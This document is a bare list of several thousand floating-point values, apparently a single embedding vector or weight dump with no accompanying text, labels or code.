-0.0041057453490793705, -0.04608798027038574, -0.022022051736712456, -0.026642365381121635, -0.0354943685233593, -0.02032361924648285, -0.01601996459066868, 0.009305397048592567, -0.016451768577098846, -0.020539522171020508, 0.007570980116724968, 0.016034357249736786, 0.011486011557281017, 0.030744513496756554, -0.019359255209565163, -0.004886592738330364, 0.029305163770914078, -0.0066425995901227, -0.03868972510099411, 0.00014269804523792118, -0.029261982068419456, -0.029852116480469704, -0.0026789898984134197, -0.00630075391381979, 0.012011374346911907, 0.03704886510968208, -0.0011388856219127774, 0.050693903118371964, -0.003188160015270114, -0.024641670286655426, -0.02688705548644066, -0.002788740210235119, -0.01858200691640377, -0.022324316203594208, 0.04888032004237175, -0.00552350515499711, -0.01590481586754322, -0.032529305666685104, -0.002869703806936741, 0.024181077256798744, -0.021878117695450783, -0.0047462559305131435, 0.016034357249736786, 0.023346254602074623, 0.013292395509779453, -0.04692280665040016, 0.022597793489694595, 0.004620313178747892, -0.010176203213632107, -0.02940591797232628, -0.012083342298865318, -0.042662329971790314, -0.02623934857547283, -0.032471731305122375, 0.016207078471779823, 0.005217642989009619, -0.022669760510325432, -0.0011541786370798945, -0.008175507187843323, 0.0224106777459383, -0.019603945314884186, 0.005217642989009619, -0.013846545480191708, 0.002099651610478759, -0.00038974895142018795, -0.00035039172507822514, 0.011039813049137592, -0.00919024832546711, -0.029880903661251068, 0.034515608102083206, 0.02226674184203148, 0.04568496346473694, -0.019978174939751625, -0.012925361283123493, -0.02603783831000328, 0.008765640668570995, 0.007563783321529627, 0.03621404245495796, 0.003925826866179705, 0.007966801524162292, 0.014681368134915829, 0.013724200427532196, 0.01832292415201664, 0.00968682486563921, 0.011874636635184288, 0.010543237440288067, -0.015185141004621983, -0.0011622749734669924, 0.014796516858041286, -0.02587950974702835, -0.019978174939751625, -0.0016201682155951858, 0.036098893731832504, 0.008441787213087082, -0.02871502935886383, -0.014602203853428364, -0.019762273877859116, 0.027002202346920967, 0.019128959625959396, 0.003889842890202999, -0.014084038324654102, -0.009031920693814754, 0.011176551692187786, -0.015976782888174057, 0.050578754395246506, -0.01627904735505581, -0.004980150610208511, 0.007078002672642469, -0.006153220776468515, -0.01260150782763958, 0.008600115776062012, -0.0077940793707966805, -0.005771792959421873, -0.016250260174274445, 0.008405802771449089, -0.02651282399892807, -0.03039906919002533, -0.03658827394247055, -0.0003162071807309985, 0.006164015736430883, 0.012292047962546349, 0.008542541414499283, -0.0023965174332261086, 0.005030527710914612, -0.004962158389389515, -0.03281717747449875, 0.0350913479924202, -0.0321262888610363, 0.01774718426167965, -0.02005014382302761, -0.0028984907548874617, -0.0012000579154118896, 0.0015643934020772576, -0.028283225372433662, -0.0043648285791277885, 0.03978363052010536, -0.046433426439762115, 0.010730353184044361, -0.01139245368540287, -0.020194077864289284, 0.019100172445178032, -0.0016444572247564793, -0.014926058240234852, -0.02298641763627529, 0.026469644159078598, -0.030514216050505638, -0.03281717747449875, -0.009147068485617638, 0.0132851991802454, 0.06413742899894714, 0.025922691449522972, -0.016091931611299515, -0.02336064726114273, -0.0030136387795209885, 0.005178060848265886, 0.004102147184312344, 0.022540219128131866, -0.00027527566999197006, -0.0007003336795605719, 0.04070481285452843, -0.008758443407714367, -0.00973720196634531, 0.002254381775856018, 0.007362274453043938, 0.019402435049414635, -0.02064027637243271, 0.005102495197206736, 0.012270457111299038, 0.004706673789769411, -0.0007835460710339248, 0.01193940732628107, 0.019877420738339424, -0.012946952134370804, 0.011831455864012241, -0.016840392723679543, -0.002283168723806739, -0.029420310631394386, -0.030283920466899872, -0.012004178017377853, -0.0033734762109816074, 0.0034796283580362797, -0.02403714321553707, 0.0009094891720451415, 0.02867184951901436, -0.010169006884098053, 0.01354428194463253, -0.013407544232904911, -0.016250260174274445, -0.02258339896798134, -0.0028499127365648746, 0.010161809623241425, -0.002797736320644617, -0.005818571895360947, -0.005796981509774923, -0.02567800134420395, 0.03206871449947357, -0.006646197754889727, 0.0031287868041545153, -0.005178060848265886, 0.016048749908804893, -0.02587950974702835, 0.03166569769382477, 0.05103934556245804, -0.009175855666399002, 0.02645524963736534, -0.00570702226832509, 0.005023330915719271, -0.027635516598820686, -0.01810702122747898, -0.009283806197345257, 0.009801972657442093, -0.0014906267169862986, 0.011118977330625057, 0.014796516858041286, -0.011896226555109024, -0.022122807800769806, 0.00016068991681095213, -0.0007025826489552855, 0.023087171837687492, 0.010190596804022789, -0.006854903418570757, 0.0021410328336060047, -0.00703482236713171, 0.012882181443274021, 0.02599465847015381, -0.009075100533664227, 0.01580406166613102, -0.028484733775258064, -0.010895878076553345, 0.02956424653530121, 0.019603945314884186, -0.00021331614698283374, 0.029852116480469704, -0.020669063553214073, 0.02861427515745163, -0.011241322383284569, -0.003979802131652832, -0.005494717974215746, -0.0007030324195511639, 0.0023983167484402657, 0.008607312105596066, 0.024915145710110664, 0.031262677162885666, 0.008484967052936554, 0.02877260372042656, -0.000958966847974807, -0.016192685812711716, -0.008233081549406052, -0.0053687747567892075, 0.01574648730456829, -0.0067937313579022884, 0.029391523450613022, 0.020597096532583237, -0.011450028046965599, 0.003936621826142073, -0.0011613754322752357, 0.000587884453125298, -0.0014447474386543036, 0.0012279453221708536, -0.039610907435417175, -0.02887335792183876, -0.003767498303204775, -0.02436819300055504, -0.014400695450603962, -0.00011132471263408661, 0.01548740454018116, -0.01895623654127121, -0.007736505474895239, -0.033047471195459366, -0.019661519676446915, 0.006415901705622673, 0.03091723471879959, -0.011593963019549847, -0.0025260590482503176, 0.013062099926173687, -0.01406964473426342, 0.00023569354380015284, 0.04841972887516022, 0.03091723471879959, 0.01927289366722107, 0.0034436446148902178, -0.0019755077082663774, -0.009283806197345257, 0.022511431947350502, -0.03843064233660698, 0.00978757906705141, 0.01612071879208088, 0.0055522918701171875, 0.004760649520903826, -0.013234822079539299, 0.008470573462545872, 0.023806845769286156, 0.019128959625959396, 0.013932906091213226, 0.0021446312312036753, 0.012385605834424496, 0.019517583772540092, 0.005602669436484575, 0.01596239022910595, 0.016048749908804893, -0.01475333608686924, 0.0011262912303209305, 0.04608798027038574, 0.021244803443551064, -0.00882321409881115, 0.0010138420620933175, -0.02336064726114273, 0.004897387698292732, 0.010255367495119572, 0.004829018842428923, 0.02540452405810356, 0.021172836422920227, 0.007020428776741028, 0.010507253929972649, 0.02163342759013176, -0.013105280697345734, -0.03644433990120888, -0.022439464926719666, -0.03526407107710838, 0.00824747420847416, 0.017502494156360626, -0.010219383984804153, 0.01679721288383007, 0.00989553052932024, 0.017300985753536224, -0.01994938962161541, 0.00614242535084486, 0.018366103991866112, -0.024080323055386543, -0.010759140364825726, 0.03460197150707245, 0.01249355636537075, 0.011795472353696823, 0.03201114013791084, -0.004314451012760401, 0.021086474880576134, -0.005286012310534716, -0.02635449543595314, 0.019042598083615303, 0.013774578459560871, 0.0444183349609375, -0.022223562002182007, -0.029967263340950012, -0.032471731305122375, -0.020194077864289284, -0.004836215637624264, -0.007527799811214209, -0.00926221627742052, 0.02357655018568039, -0.008931165561079979, -0.008204294368624687, 0.003969007171690464, 0.014076841063797474, -0.006056064274162054, -0.03198235481977463, 0.013234822079539299, 0.017416132614016533, -0.012299244292080402, -0.012839000672101974, -0.03203992918133736, 0.00836981926113367, 0.03497620299458504, 0.0039006380829960108, -0.0028930932749062777, 0.0032763201743364334, 0.03465954586863518, -0.0054443408735096455, 0.003152176272124052, 0.028585487976670265, -0.0133859533816576, 0.022554611787199974, 0.014810909517109394, -0.006559837143868208, -0.018409283831715584, -0.00400499114766717, 0.029967263340950012, -0.010802320204675198, -0.008708066307008266, -0.006376320030540228, 0.003907834645360708, 0.012227277271449566, 0.010370515286922455, 0.010435285978019238, -0.009183051995933056, -0.011781078763306141, -0.0037603015080094337, 0.0004673388903029263, 0.005519906524568796, -0.03149297460913658, 0.0017811954021453857, -0.002815728075802326, -0.026325708255171776, 0.0014672372490167618, -0.01763203553855419, -0.00026133196661248803, -0.0035821818746626377, 0.014105628244578838, -0.013292395509779453, 0.03811398521065712, -0.013522692024707794, 0.015458617359399796, -0.007405454758554697, -0.00952849630266428, -0.0002563841990195215, 0.02824004366993904, 0.020035749301314354, 0.005944514647126198, 0.013429134152829647, 0.01958955079317093, 0.007858850061893463, -0.007013231981545687, 0.0007543092942796648, 0.019186533987522125, -0.018438071012496948, 0.011241322383284569, -0.002331746742129326, -0.00270417844876647, 0.0061712125316262245, -0.004623911343514919, 0.010169006884098053, 0.007945211604237556, 0.0212160162627697, -0.008887985721230507, -0.016682064160704613, 0.005178060848265886, -0.007319094147533178, -0.017516886815428734, -0.004681485239416361, 0.0009436737163923681, 0.007599767297506332, 0.06471317261457443, 0.010363318957388401, 0.0009247823036275804, 0.007506209425628185, -0.01207614503800869, -0.02609541267156601, -0.03123389184474945, -0.009255019947886467, 0.0005078206304460764, 0.013666626997292042, 0.0037603015080094337, -0.004760649520903826, -0.02530376985669136, 0.01659570448100567, -0.013515494763851166, -0.023950781673192978, 0.042921412736177444, -0.007391061633825302, -0.005451537668704987, 0.020712243393063545, 0.025865117087960243, 0.027333253994584084, 0.015113173052668571, 0.00467428844422102, 0.02284248173236847, -0.014235169626772404, 0.005411955527961254, -0.004692280665040016, -0.002556645078584552, -0.0034598372876644135, -0.029852116480469704, -0.015688912943005562, -0.009888333268463612, 0.013573069125413895, 0.003004642901942134, -0.00029551651095971465, 0.005451537668704987, -0.00706001091748476, 0.0007381166215054691, 0.0026232150848954916, -0.008053162135183811, -0.021978871896862984, -0.03627161681652069, -0.006613812409341335, 0.007419848348945379, -0.014292743988335133, 0.00519965123385191, 0.0008325739181600511, -0.02629692107439041, 0.019488796591758728, 0.02195008471608162, 0.022669760510325432, -0.007221937645226717, -0.0031287868041545153, 0.007614160887897015, 0.0011649738298729062, 0.025159835815429688, 0.008384212851524353, -0.001028235536068678, -0.028024140745401382, 0.025591639801859856, -0.028484733775258064, 0.012723852880299091, 0.029880903661251068, 0.018941843882203102, 0.003213348565623164, 0.016682064160704613, -0.011406847275793552, -0.030283920466899872, -0.016264652833342552, -0.026944629848003387, -0.010989435948431492, 0.004336041398346424, -0.011694717220962048, 0.006221589632332325, 0.006487869657576084, 0.0025116654578596354, 0.012975739315152168, -0.011881832964718342, -0.02367730438709259, 0.008708066307008266, -0.00826906505972147, -0.008923969231545925, 0.005951711442321539, 0.010831107385456562, -0.013788971118628979, -0.00021736431517638266, 0.014666974544525146, -0.006959256716072559, -0.0022507833782583475, 0.006009285803884268, -0.013508298434317112, 0.016466163098812103, 0.0009319790406152606, 0.02776505798101425, 0.028153682127594948, 0.001232443260960281, -0.010939058847725391, 0.030859660357236862, -0.0024522922467440367, -0.013393150642514229, 0.0043648285791277885, 0.0033806730061769485, -0.049053043127059937, 0.012630295008420944, -0.004969355184584856, -0.005782587919384241, -0.0028625070117413998, -0.02246825024485588, 0.006678583100438118, -0.004886592738330364, 0.01010423619300127, 0.04038815572857857, 0.015300288796424866, -0.011003829538822174, 0.010636795312166214, 0.008866394869983196, -0.03129146620631218, -0.016998721286654472, 0.037567030638456345, 0.01580406166613102, -0.002320951549336314, 0.015314682386815548, -0.019618337973952293, 0.005088101606816053, -0.0008366220863536, -0.027952173724770546, 0.023130351677536964, 0.014638188295066357, 0.006038072519004345, -0.0011532790958881378, 0.024267438799142838, -0.012536737136542797, -0.005609866231679916, 0.002880498766899109, -0.018754728138446808, -0.023432616144418716, -0.0015589958056807518, 0.01721462421119213, 0.018438071012496948, 0.01078792754560709, -0.020928146317601204, -0.03868972510099411, 0.006379918195307255, -0.006538246758282185, -0.0006081252940930426, -0.0016597502399235964, 0.019834240898489952, 0.0029452696908265352, -0.0029056875500828028, 0.036357976496219635, 0.01212652213871479, 0.014998025260865688, 0.010068251751363277, -0.0006171212298795581, 0.00284091685898602, -0.002148229628801346, 0.004292861092835665, 0.009837956167757511, 0.00931979063898325, 0.005689030047506094, -0.019330468028783798, -0.0008955454686656594, -0.005361577961593866, -0.01212652213871479, -0.013457921333611012, -0.018941843882203102, -0.0023911199532449245, 0.008736853487789631, 0.02467045560479164, 0.000958966847974807, -0.0010651189368218184, 0.017459314316511154, 0.007031224202364683, -0.003121590008959174, -0.006772140972316265, 0.005206848029047251, 0.0049981423653662205, 0.010643992573022842, 0.007765292190015316, -0.006552640348672867, 0.02005014382302761, 0.015444223769009113, 0.007650144398212433, -0.003010040381923318, 0.005850957240909338, -0.010442483238875866, -0.00671816524118185, -0.02209402061998844, 0.026757514104247093, -0.009096691384911537, 0.006980846635997295, 0.0018063840689137578, -0.002986650913953781, -0.0011388856219127774, -0.013119674287736416, -0.019877420738339424, 0.007078002672642469, -0.0031953565776348114, -0.0058113751001656055, 0.002576436148956418, -0.01193940732628107, 0.015444223769009113, 0.007203945890069008, 0.021748576313257217, 0.008902378380298615, 0.010212186723947525, 0.005577480420470238, 0.004138130694627762, 0.008175507187843323, 0.005832965020090342, -0.007200347725301981, 0.007671734783798456, 0.004058966413140297, 0.0026304118800908327, -0.009103887714445591, 0.028412766754627228, 0.029146835207939148, 0.014897271059453487, -0.009118281304836273, -0.01470295898616314, 0.011752291582524776, -0.00009665009565651417, 0.013551479205489159, -0.004854207392781973, -0.010377712547779083, -0.0030478232074528933, 0.005926522891968489, -0.025649214163422585, 0.007966801524162292, 0.008182703517377377, 0.005332791246473789, 0.012522343546152115, 0.010255367495119572, -0.003972605802118778, -0.016091931611299515, -0.0024343004915863276, -0.015775274485349655, 0.005991293583065271, 0.006775739602744579, 0.015688912943005562, 0.0005523504805751145, -0.022007659077644348, -0.006322344299405813, -0.004929773043841124, 0.00826906505972147, 0.006394311785697937, -0.007131978403776884, -0.009283806197345257, -0.006390713155269623, -0.008650492876768112, -0.00362176401540637, -0.016091931611299515, -0.010593614540994167, -0.0008528147591277957, 0.022497037425637245, -0.010939058847725391, 0.006297155749052763, -0.02661357820034027, 0.008722459897398949, -0.015285895206034184, 0.011853045783936977, 0.02724689245223999, -0.008146720007061958, -0.02010771818459034, 0.002058270387351513, -0.029434705153107643, -0.014062448404729366, 0.0151707474142313, -0.012083342298865318, -0.016408588737249374, -0.027318859472870827, -0.011536388657987118, -0.007178757339715958, 0.02613859251141548, 0.004271270707249641, 0.004044573288410902, -0.017099475488066673, 0.022338708862662315, -0.011687520891427994, -0.005768194328993559, 0.017416132614016533, 0.026757514104247093, 0.014235169626772404, 0.01422797329723835, -0.0021302378736436367, 0.02641206979751587, -0.00011762187205022201, -0.021619034931063652, -0.0022741728462278843, -0.000982356257736683, -0.009132674895226955, 0.02167660929262638, -0.018596399575471878, 0.003958212211728096, 0.004350434988737106, -0.013983284123241901, 0.007013231981545687, 0.000635113101452589, 0.011781078763306141, 0.016509342938661575, -0.023850027471780777, -0.0037207193672657013, 0.0018855483504012227, -0.0034832265228033066, 0.010859894566237926, -0.031780846416950226, -0.028902145102620125, 0.008146720007061958, 0.006178409326821566, 0.00611723680049181, -0.020827392116189003, -0.0035156121011823416, -0.010636795312166214, -0.006685779895633459, -0.02718931809067726, 0.016422981396317482, -0.0002572837984189391, 0.012054555118083954, -0.01580406166613102, 0.02361973188817501, -0.03523528575897217, -0.012889377772808075, -0.02010771818459034, -0.00590853113681078, 0.02153267338871956, 0.0186395812779665, -0.012479162774980068, -0.01707068830728531, 0.010946255177259445, -0.02341822162270546, 0.0038970396853983402, -0.0007178757223300636, 0.0020060937386006117, 0.0019557166378945112, -0.003382472088560462, -0.0038394657894968987, -0.002277771243825555, -0.02577875554561615, 0.014163202606141567, 0.01291816495358944, 0.0003105846990365535, -0.0014996225945651531, 0.004879395943135023, -0.005048519466072321, 0.01230644155293703, 0.005070109851658344, 0.006991642061620951, -0.00024828786263242364, 0.006847707089036703, 0.028182469308376312, 0.008117932826280594, 0.012824607081711292, -0.00004725678081740625, 0.01989181526005268, -0.0026340102776885033, -0.00405536824837327, 0.009291003458201885, -0.005451537668704987, 0.0009598664473742247, -0.004033777862787247, -0.009456528350710869, 0.015775274485349655, -0.008261867798864841, 0.00989553052932024, 0.0066282059997320175, -0.009564479812979698, -0.000013008967471250799, 0.009391757659614086, 0.005645849741995335, 0.0186395812779665, -0.01042089331895113, 0.016135111451148987, 0.014940451830625534, -0.007822866551578045, -0.020194077864289284, -0.011471617966890335, -0.009442134760320187, 0.012299244292080402, 0.020021356642246246, 0.011860243044793606, 0.004303656052798033, 0.004429599270224571, -0.00023524374410044402, 0.0025872313417494297, 0.005534300114959478, 0.0003692831960506737, 0.010039465501904488, 0.015717700123786926, -0.009291003458201885, 0.0224106777459383, -0.004314451012760401, -0.006970051676034927, -0.002981253433972597, -0.014954844489693642, -0.005304004065692425, -0.008693672716617584, -0.025807542726397514, 0.0057753911241889, 0.021388739347457886, -0.014652581885457039, 0.013198837637901306, -0.00044799764873459935, -0.002535054925829172, -0.010744746774435043, -0.01601996459066868, -0.003558792406693101, -0.0045627388171851635, -0.0012306440621614456, 0.015473010949790478, -0.00014629641373176128, 0.014465466141700745, -0.006304352544248104, -0.0018405686132609844, -0.04767126590013504, -0.0004108893917873502, 0.017617642879486084, -0.005840161815285683, 0.010464073158800602, -0.005789784714579582, 0.0023713288828730583, -0.011032616719603539, 0.01826534979045391, -0.014537433162331581, 0.03445803374052048, -0.02110086940228939, 0.016941146925091743, 0.00024716334883123636, -0.015429830178618431, 0.034573182463645935, -0.006318745668977499, 0.0028984907548874617, -0.007923620752990246, -0.017732789739966393, 0.015141960233449936, -0.0002703279023990035, -0.01701311580836773, 0.020870571956038475, -0.017473706975579262, -0.016998721286654472, 0.010111432522535324, -0.0011568774934858084, -0.018869876861572266, -0.00645908247679472, -0.007916424423456192, -0.006106441840529442, -0.01810702122747898, -0.01643737591803074, 0.018884269520640373, 0.029434705153107643, 0.006739755626767874, 0.04205780103802681, 0.008125130087137222, -0.000024710712750675157, -0.012522343546152115, 0.008197097107768059, -0.03684735670685768, -0.004472779575735331, -0.001910736900754273, 0.0356958769261837, 0.006311548873782158, -0.008326638489961624, 0.0007844456704333425, -0.0026538013480603695, 0.008535344153642654, -0.009708414785563946, -0.006106441840529442, -0.029967263340950012, 0.00931979063898325, -0.009794775396585464, 0.0072687165811657906, -0.007916424423456192, 0.0063367378897964954, 0.00332129979506135, -0.011003829538822174, -0.008168309926986694, 0.0015041205333545804, -0.0032745208591222763, -0.021072082221508026, 0.007930818013846874, 0.002448693849146366, 0.02104329504072666, 0.022022051736712456, 0.01812141388654709, 0.017444919794797897, -0.006012883968651295, -0.02030922658741474, -0.016840392723679543, -0.013724200427532196, 0.005778989754617214, 0.01842367835342884, 0.029276376590132713, -0.010392106138169765, 0.011090190149843693, -0.005527103319764137, 0.013724200427532196, 0.007693324703723192, -0.0018783515552058816, 0.0072507248260080814, 0.007815669290721416, 0.0033878698013722897, 0.0020978522952646017, 0.015127566643059254, 0.01649494841694832, -0.011039813049137592, 0.0018855483504012227, 0.0133859533816576, 0.02883017808198929, -0.01673963852226734, -0.006239581387490034, -0.004390017129480839, 0.0004695878888014704, 0.0035875795874744654, 0.007635750807821751, -0.022079626098275185, 0.005739407613873482, -0.005401160102337599, 0.005581079050898552, -0.0045519438572227955, 0.007887637242674828, -0.02346140332520008, -0.0031467785593122244, 0.02179175615310669, 0.029938476160168648, 0.0049117812886834145, 0.004022982902824879, 0.02046755515038967, 0.02151828072965145, 0.007484619040042162, -0.021921297535300255, 0.009780381806194782, -0.021503886207938194, 0.0068872892297804356, 0.014551826752722263, 0.013479511253535748, -0.017401739954948425, 0.010147416032850742, 0.023490188643336296, -0.008189900778234005, 0.0017146255122497678, -0.004382820334285498, 0.008492164313793182, -0.003936621826142073, 0.003958212211728096, -0.004199303220957518, 0.01532907597720623, -0.030514216050505638, 0.011824258603155613, -0.01842367835342884, -0.009024723432958126, 0.01181706227362156, 0.018308529630303383, -0.004688682034611702, -0.001923331175930798, 0.00006533299165312201, -0.0051924544386565685, -0.020237259566783905, -0.008729657158255577, 0.017977479845285416, -0.0230008102953434, -0.006207196041941643, 0.028571095317602158, 0.009499709121882915, -0.008664886467158794, -0.004058966413140297, -0.010284154675900936, -0.002099651610478759, -0.00023974171199370176, -0.001239640056155622, -0.004130933899432421, -0.0057753911241889, -0.00934857688844204, 0.012032964266836643, 0.009593266993761063, 0.0033302956726402044, -0.010125826112926006, -0.016235865652561188, -0.004026581067591906, -0.004220893606543541, 0.020136503502726555, 0.025490885600447655, 0.020769817754626274, -0.016768425703048706, -0.012018571607768536, 0.0009229831048287451, -0.008628902025520802, -0.011536388657987118, -0.021906904876232147, -0.012867787852883339, -0.012198490090668201, -0.007938014343380928, 0.0003888493520207703, 0.006207196041941643, -0.010406499728560448, -0.00039267263491638005, -0.003186360700055957, -0.02367730438709259, -0.017919905483722687, 0.019603945314884186, 0.00795240793377161, 0.01317724771797657, -0.022396283224225044, -0.004062565043568611, 0.007693324703723192, -0.0013655831571668386, 0.006761346012353897, 0.01637980155646801, -0.004591525997966528, -0.01522832177579403, -0.008081949315965176, 0.016811605542898178, -0.022669760510325432, 0.03091723471879959, 0.02536134421825409, 0.022540219128131866, -0.006304352544248104, -0.0011919615790247917, -0.0037171209696680307, 0.005142077337950468, -0.0016318628331646323, -0.013695414178073406, -0.0074342419393360615, 0.03799883648753166, -0.009773185476660728, 0.008081949315965176, -0.009845152497291565, -0.012140915729105473, 0.0043648285791277885, 0.019085779786109924, 0.014393498189747334, 0.013278001919388771, -0.0038070804439485073, -0.0004929773276671767, 0.019877420738339424, -0.0030442248098552227, -0.014551826752722263, -0.023231105878949165, -0.01097504235804081, 0.010392106138169765, 0.014998025260865688, -0.008189900778234005, -0.0012981136096641421, 0.004803830292075872, -0.014357514679431915, -0.002804933115839958, 0.01003226824104786, -0.008261867798864841, -0.012018571607768536, -0.004836215637624264, -0.005483923014253378, 0.009658037684857845, -0.005221241619437933, 0.022396283224225044, -0.02883017808198929, -0.011809865944087505, 0.01118374802172184, 0.0019143352983519435, -0.024540914222598076, 0.002155426423996687, 0.0017119267722591758, -0.003650550963357091, -0.002430702093988657, -0.014062448404729366, -0.00874405074864626, -0.015242714434862137, -0.004739059135317802, 0.015530584380030632, 0.014184792526066303, 0.003377074608579278, 0.0016480556223541498, -0.007887637242674828, -0.01165873371064663, -0.00973720196634531, -0.015732094645500183, -0.018178988248109818, -0.015832848846912384, -0.006146023981273174, 0.03753824532032013, -0.015919208526611328, -0.02105768769979477, -0.02314474619925022, 0.008520951494574547, 0.013681020587682724, 0.003468833165243268, 0.0008447184227406979, -0.023490188643336296, -0.026009051129221916, 0.002239988185465336, 0.008988739922642708, 0.0014042656403034925, -0.024483341723680496, 0.037624605000019073, 0.0038754495326429605, 0.00598409678786993, 0.028700636699795723, -0.018308529630303383, -0.014199186116456985, 0.024022748693823814, 0.0011766684474423528, -0.0013682818971574306, -0.005052118096500635, -0.02950667217373848, -0.02976575493812561, 0.003431050106883049, -0.005023330915719271, -0.009996284730732441, -0.0002147779887309298, 0.0003171067510265857, -0.011622750200331211, -0.0230008102953434, -0.003028032137081027, 0.011140568181872368, 0.009751595556735992, 0.02808171510696411, -0.012745442800223827, 0.007945211604237556, 0.0031287868041545153, 0.00405536824837327, -0.017315378412604332, -0.022022051736712456, -0.00022984617680776864, -0.01491166464984417, 0.008909575641155243, 0.00467428844422102, 0.00343824690207839, -0.013796168379485607, 0.01838049665093422, 0.009751595556735992, 0.0006333139608614147, 0.005966105032712221, 0.00877283699810505, -0.019647125154733658, 0.010831107385456562, 0.014825303107500076, -0.0007097793859429657, -0.002961462363600731, 0.01354428194463253, 0.013242018409073353, 0.005948113277554512, -0.009909924119710922, 0.013479511253535748, 0.0031467785593122244, -0.02058270201086998, -0.008391409181058407, -0.027002202346920967, -0.014940451830625534, -0.02089935913681984, -0.0050089373253285885, 0.005109691992402077, 0.019431222230196, 0.009794775396585464, 0.011831455864012241, 0.003645153483375907, 0.025764362886548042, 0.016207078471779823, -0.001935925567522645, 0.010550434701144695, 0.004271270707249641, -0.008297852240502834, -0.016610097140073776, 0.00170652917586267, -0.03480347990989685, 0.014782123267650604, -0.0014960241969674826, -0.007358676288276911, -0.013580265454947948, -0.008780034258961678, -0.009765989147126675, 0.009046313352882862, -0.0014906267169862986, 0.017919905483722687, -0.01974787935614586, -0.014407891780138016, -0.003843064187094569, -0.013904119841754436, 0.013760184869170189, 0.01826534979045391, -0.0039006380829960108, 0.018927451223134995, 0.0036793381441384554, -0.010939058847725391, -0.007973997853696346, 0.009147068485617638, 0.03428531438112259, -0.0007547590648755431, -0.03417016565799713, 0.019431222230196, -0.018653973937034607, 0.0150699932128191, 0.008024374954402447, -0.002497271867468953, -0.016869179904460907, 0.007995588704943657, -0.0029344744980335236, -0.011018223129212856, -0.0028858964797109365, -0.009830759838223457, 0.009773185476660728, 0.005832965020090342, -0.015530584380030632, 0.006959256716072559, 0.01957515813410282, 0.006246778182685375, 0.021086474880576134, 0.01191781647503376, -0.002351537812501192, -0.0013574868207797408, 0.02026604674756527, 0.01065838523209095, -0.007542193401604891, 0.006862100213766098, -0.019762273877859116, -0.0039222282357513905, 0.0017425129190087318, -0.0022363897878676653, 0.007405454758554697, 0.018596399575471878, -0.0014447474386543036, -0.02672872692346573, 0.00015158152382355183, 0.0019809051882475615, 0.025706788524985313, 0.0067937313579022884, -0.004318049643188715, 0.03811398521065712, -0.004807428456842899, 0.013090887106955051, 0.005026929546147585, -0.0030550200026482344, 0.010456876829266548, -0.0006567033706232905, 0.002912884345278144, -0.003353685140609741, 0.012061751447618008, -0.004073360003530979, -0.0004772344254888594, -0.004962158389389515, -0.0017991872737184167, -0.015501798130571842, 0.007110388018190861, -0.016466163098812103, 0.029420310631394386, -0.009701217524707317, -0.012637491337954998, -0.0043648285791277885, -0.01113337092101574, -0.0009643643861636519, 0.01738734543323517, -0.033623211085796356, -0.006174810696393251, -0.0370776504278183, -0.011579569429159164, 0.03123389184474945, 0.009434938430786133, -0.015588158741593361, -0.012471966445446014, -0.002959663048386574, -0.01422797329723835, -0.0018216772004961967, -0.00700963381677866, 0.0007264218875207007, 0.00753499660640955, -0.0014420485822483897, -0.025476492941379547, -0.008600115776062012, 0.004339639563113451, -0.01780475676059723, 0.012256063520908356, 0.01748810149729252, -0.04277747869491577, 0.008305048570036888, 0.009125477634370327, -0.01083830464631319, 0.012212883681058884, -0.009622054174542427, -0.011946603655815125, 0.019618337973952293, 0.012932558543980122, -0.010298548266291618, -0.00042325881076976657, -0.011486011557281017, -0.00957887340337038, 0.006761346012353897, -0.007808472961187363, -0.021647822111845016, -0.009996284730732441, 0.017401739954948425, -0.0036199649330228567, -0.000014548116268997546, -0.009125477634370327, 0.02599465847015381, -0.01858200691640377, 0.0301399864256382, 0.009305397048592567, 0.019301680848002434, -0.0007358675939030945, -0.001502321450971067, -0.018250955268740654, 0.02005014382302761, 0.006365524604916573, -0.008261867798864841, 0.010413696058094501, -0.017099475488066673, 0.006728960666805506, -0.003395066363736987, -0.002563841873779893, -0.00800278503447771, 0.009341380558907986, 0.00449077133089304, -0.006002089008688927, 0.005689030047506094, -0.00316297123208642, 0.012097735889256, 0.028254438191652298, -0.015631338581442833, 0.00442240247502923, 0.02288566343486309, 0.04366987571120262, 0.01202576793730259, -0.006944863125681877, -0.00011464196722954512, -0.00800998229533434, 0.0058113751001656055, -0.015386649407446384, 0.0008132326765917242, 0.0051816594786942005, 0.0040949503891170025, 0.01509877946227789, -0.00353000545874238, 0.010089842602610588, 0.0005689929821528494, -0.0056278579868376255, 0.007383864838629961, -0.010320138186216354, -0.0019467206439003348, 0.013781774789094925, 0.006289958953857422, 0.008736853487789631, 0.01806384138762951, -0.00105342420283705, -0.020884966477751732, -0.0010678176768124104, -0.004677887074649334, 0.013098083436489105, -0.00444759102538228, -0.01015461329370737, 0.013429134152829647, -0.010643992573022842, 0.02546209841966629, 0.012378408573567867, -0.013184444978833199, -0.001374579151161015, 0.010852698236703873, 0.011068600229918957, -0.003126987488940358, 0.0021788158919662237, 0.004872199147939682, 0.01838049665093422, -0.004260475747287273, -0.005145675502717495, 0.0029938477091491222, 0.015876028686761856, -0.0011532790958881378, 0.015401042997837067, 0.023706091567873955, -0.00010665807349141687, -0.014371908269822598, -0.004785838071256876, 0.003810678608715534, -0.0083770165219903, 0.019330468028783798, -0.0053471848368644714, -0.019128959625959396, -0.0005775391473434865, 0.013501101173460484, 0.005656644701957703, 0.009909924119710922, -0.014926058240234852, -0.004130933899432421, -0.006916075944900513, 0.01485409028828144, 0.01464538462460041, -0.023979568853974342, -0.004357631783932447, 0.006930469535291195, -0.00238212407566607, -0.015674520283937454, 0.00011098737013526261, -0.007448635529726744, 0.0014609401114284992, 0.015343469567596912, 0.006146023981273174, 0.007236331235617399, -0.014796516858041286, 0.0048110270872712135, 0.011543585918843746, 0.0036829363089054823, -0.015343469567596912, -0.0009571676491759717, -0.00371352257207036, 0.014825303107500076, -0.0038934412878006697, -0.0003299259697087109, 0.008168309926986694, -0.02298641763627529, -0.0005505513399839401, -0.015199534595012665, -0.012299244292080402, 0.00515647092834115, -0.0038250721991062164, 0.03108995594084263, -0.002479280112311244, 0.002691584173589945, -0.013400346972048283, 0.024641670286655426, -0.015127566643059254, -0.03201114013791084, -0.014033661223948002, 0.0037531047128140926, 0.02477121166884899, 0.005624259356409311, -0.015933603048324585, -0.01086709089577198, 0.025231802836060524, 0.002204004442319274, -0.024166684597730637, 0.011421240866184235, 0.00653464812785387, 0.015789667144417763, 0.006505861412733793, 0.01501241885125637, 0.008420196361839771, 0.005048519466072321, 0.0035515958443284035, -0.009031920693814754, 0.0026286125648766756, -0.0036775388289242983, 0.015976782888174057, -0.015516191720962524, -0.0078804399818182, -0.013601856306195259, 0.007088798098266125, -0.0018369702156633139, -0.001218949444591999, 0.011334880255162716, 